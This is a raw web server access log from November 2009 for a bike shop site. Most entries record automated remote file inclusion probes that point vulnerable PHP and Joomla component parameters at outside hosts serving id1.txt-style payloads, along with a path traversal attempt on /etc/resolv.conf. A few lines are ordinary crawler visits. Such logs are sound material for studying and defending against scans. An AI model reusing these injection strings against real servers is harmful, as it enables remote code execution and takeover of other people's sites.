93.113.3.106 - - [10/Nov/2009:21:02:24 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:02:24 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:02:47 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:02:47 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:02:47 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:02:53 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:02:53 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:02:53 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.58.164.77 - - [10/Nov/2009:21:03:25 -0800] "GET //?page=http://204.3.167.134/xxx?????????????????????????????????????????????????????????????????????????????????????????????????&mode=id HTTP/1.1" 200 1764 "-" "-" "houstonbikeshop.com"
85.214.74.222 - - [10/Nov/2009:21:11:23 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [10/Nov/2009:21:16:10 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
157.100.230.82 - - [10/Nov/2009:21:17:48 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
157.100.230.82 - - [10/Nov/2009:21:17:48 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
157.100.230.82 - - [10/Nov/2009:21:17:48 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.1.108.195 - - [10/Nov/2009:21:21:22 -0800] "GET /?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 200 1764 "-" "-" "houstonbikeshop.com"
200.1.108.195 - - [10/Nov/2009:21:21:23 -0800] "GET /?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 200 1764 "-" "-" "houstonbikeshop.com"
200.1.108.195 - - [10/Nov/2009:21:21:23 -0800] "GET /?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 200 1764 "-" "-" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:23:09 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:23:09 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:25:26 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:25:26 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:25:26 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:26:22 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:26:22 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:26:22 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:26:25 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:26:25 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:26:25 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
157.100.230.82 - - [10/Nov/2009:21:26:27 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.3.168 - - [10/Nov/2009:21:30:05 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.qchatting.com/ezshop/.../id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.3.168 - - [10/Nov/2009:21:30:05 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.qchatting.com/ezshop/.../id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.3.168 - - [10/Nov/2009:21:30:05 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.qchatting.com/ezshop/.../id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [10/Nov/2009:21:30:42 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.3.168 - - [10/Nov/2009:21:31:31 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.qchatting.com/ezshop/.../id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.3.168 - - [10/Nov/2009:21:31:31 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.qchatting.com/ezshop/.../id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.3.168 - - [10/Nov/2009:21:31:31 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.qchatting.com/ezshop/.../id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.115.213.162 - - [10/Nov/2009:21:40:22 -0800] "GET /errors.php?error=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.115.213.162 - - [10/Nov/2009:21:40:22 -0800] "GET /logs/access.log%20%20/errors.php?error=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.115.213.162 - - [10/Nov/2009:21:40:22 -0800] "GET /logs/errors.php?error=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:21:44:12 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mebel-hotel.ru/i/1/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:21:44:12 -0800] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mebel-hotel.ru/i/1/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:21:44:12 -0800] "GET /logs/access.log%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mebel-hotel.ru/i/1/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
157.100.230.82 - - [10/Nov/2009:21:44:30 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:21:47:55 -0800] "GET /logs/access.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mebel-hotel.ru/i/1/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.112.85 - - [10/Nov/2009:21:51:20 -0800] "GET /bullitinboard/viewtopic.php?p=2036 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
208.80.193.33 - - [10/Nov/2009:21:54:10 -0800] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {5A203A64-8206-4827-BAE5-4A5A3CC28F36}; .NET CLR 1.1.4322)" "www.svbikes.com"
70.38.112.174 - - [10/Nov/2009:22:12:42 -0800] "GET /logs/access.log%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://mebel-hotel.ru/i/1/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:22:12:42 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://mebel-hotel.ru/i/1/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:22:12:42 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://mebel-hotel.ru/i/1/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:22:13:09 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://mebel-hotel.ru/i/1/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:22:13:09 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://mebel-hotel.ru/i/1/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:22:13:09 -0800] "GET /logs/access.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://mebel-hotel.ru/i/1/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:22:13:30 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:22:13:31 -0800] "GET /logs/access.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:22:13:31 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:22:14:03 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:22:14:04 -0800] "GET /logs/access.log%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:22:14:04 -0800] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:22:14:23 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:22:14:23 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:22:14:24 -0800] "GET /logs/access.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:22:15:04 -0800] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://mebel-hotel.ru/i/1/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:22:15:04 -0800] "GET /logs/access.log%20%20//components/com_securityimages/lang.php?mosConfig_absolute_path=http://mebel-hotel.ru/i/1/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:22:15:04 -0800] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://mebel-hotel.ru/i/1/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:22:15:42 -0800] "GET /logs/access.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:22:15:42 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:22:15:42 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:22:16:35 -0800] "GET /logs/access.log%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:22:16:35 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:22:16:36 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:22:17:47 -0800] "GET /logs/access.log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://mebel-hotel.ru/i/1/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.88.43.25 - - [10/Nov/2009:22:29:14 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.svbikes.com"
151.8.79.19 - - [10/Nov/2009:22:36:08 -0800] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
151.8.79.19 - - [10/Nov/2009:22:36:08 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
151.8.79.19 - - [10/Nov/2009:22:36:08 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.3.168 - - [10/Nov/2009:22:42:11 -0800] "GET /logs/access.log%20%20//wp-components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.qchatting.com/ezshop/.../id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.3.168 - - [10/Nov/2009:22:42:11 -0800] "GET /wp-components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.qchatting.com/ezshop/.../id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.3.168 - - [10/Nov/2009:22:42:11 -0800] "GET /logs//wp-components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.qchatting.com/ezshop/.../id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.3.168 - - [10/Nov/2009:22:42:42 -0800] "GET /wp-components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.qchatting.com/ezshop/.../id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.3.168 - - [10/Nov/2009:22:42:43 -0800] "GET /logs/access.log%20%20//wp-components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.qchatting.com/ezshop/.../id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.3.168 - - [10/Nov/2009:22:42:43 -0800] "GET /logs//wp-components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.qchatting.com/ezshop/.../id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.181.60 - - [10/Nov/2009:22:44:53 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.spotmerkezi.com/cache/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.181.60 - - [10/Nov/2009:22:44:53 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.spotmerkezi.com/cache/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.181.60 - - [10/Nov/2009:22:44:53 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.spotmerkezi.com/cache/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.181.60 - - [10/Nov/2009:22:44:53 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.spotmerkezi.com/cache/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
113.52.152.38 - - [10/Nov/2009:22:45:41 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.spotmerkezi.com/cache/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
113.52.152.38 - - [10/Nov/2009:22:45:41 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.spotmerkezi.com/cache/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
113.52.152.38 - - [10/Nov/2009:22:45:41 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.spotmerkezi.com/cache/fx29id.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
113.52.152.38 - - [10/Nov/2009:22:45:41 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.spotmerkezi.com/cache/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
119.63.193.75 - - [10/Nov/2009:22:47:49 -0800] "GET /bullitinboard/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
119.63.193.75 - - [10/Nov/2009:22:49:50 -0800] "GET /bullitinboard/viewtopic.php?p=15375 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
62.103.31.24 - - [10/Nov/2009:22:53:18 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [10/Nov/2009:22:53:18 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [10/Nov/2009:22:53:18 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [10/Nov/2009:22:53:18 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [10/Nov/2009:22:53:24 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [10/Nov/2009:22:53:24 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [10/Nov/2009:22:53:25 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [10/Nov/2009:22:53:25 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:22:53:36 -0800] "GET /logs//skin/zero_vote/ask.password.php?sourcedir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:22:53:37 -0800] "GET /skin/zero_vote/ask.password.php?sourcedir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:22:53:37 -0800] "GET /logs/access.log%20%20//skin/zero_vote/ask.password.php?sourcedir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
113.52.152.38 - - [10/Nov/2009:22:56:09 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.spotmerkezi.com/cache/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
113.52.152.38 - - [10/Nov/2009:22:56:09 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://www.spotmerkezi.com/cache/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:22:57:48 -0800] "GET /skin/zero_vote/ask.password.php?sourcedir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:22:57:48 -0800] "GET /logs//skin/zero_vote/ask.password.php?sourcedir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:22:57:48 -0800] "GET /logs/access.log//skin/zero_vote/ask.password.php?sourcedir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:22:58:10 -0800] "GET /skin/zero_vote/ask.password.php?sourcedir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:22:58:10 -0800] "GET /logs//skin/zero_vote/ask.password.php?sourcedir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:22:58:10 -0800] "GET /logs/access.log//skin/zero_vote/ask.password.php?sourcedir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.28.22 - - [10/Nov/2009:22:59:47 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.28.22 - - [10/Nov/2009:22:59:47 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
